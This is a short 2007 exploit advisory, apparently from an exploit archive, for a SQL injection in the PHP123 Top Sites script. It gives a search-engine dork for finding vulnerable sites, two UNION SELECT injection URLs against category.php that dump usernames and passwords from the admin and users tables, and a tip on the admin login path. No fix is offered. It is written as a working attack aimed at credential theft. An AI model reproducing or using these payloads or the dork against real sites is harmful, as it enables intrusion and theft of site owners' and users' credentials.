PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln

2007-07-28 00:00:00

--==+================================================================================+==--
--==+ PHP123 Top Sites SQL Injection Vulnerbility +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"


DESCRIPTION:
pull out admin/users login credentials


EXPLOITS:
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*


NOTE/TIP:
admin login is at /siteadmin/
altavista also returns a few diffrent results, dnt use the allintext: thou.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org !


--==+================================================================================+==--
--==+ PHP123 Top Sites SQL Injection Vulnerbility +==--
--==+================================================================================+==--

#

Fixes

No fixes

In order to submit a new fix you need to be registered.